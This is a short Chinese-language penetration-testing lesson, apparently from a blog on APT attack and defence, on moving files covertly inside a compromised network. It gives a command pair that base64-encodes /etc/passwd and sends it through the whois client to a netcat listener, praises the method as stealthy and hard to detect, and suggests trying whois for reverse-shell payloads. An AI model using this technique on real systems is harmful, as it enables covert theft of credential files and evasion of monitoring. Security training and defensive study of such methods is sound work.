第五十三課:內(nèi)網(wǎng)滲透中的文件傳輸
專注APT攻擊與防御
https://micropoor.blogspot.com/

利用whois傳輸文件:

傳輸機(jī):
root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`

接受機(jī):
root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d
優(yōu)點(diǎn):適用于隱蔽傳輸。最小化被發(fā)現(xiàn)。
缺點(diǎn):適用于傳輸小文件。

后者的話:whois是否同樣適用于payload的反彈,是一個(gè)非常有趣的實(shí)驗(yàn)。

Micropoor
?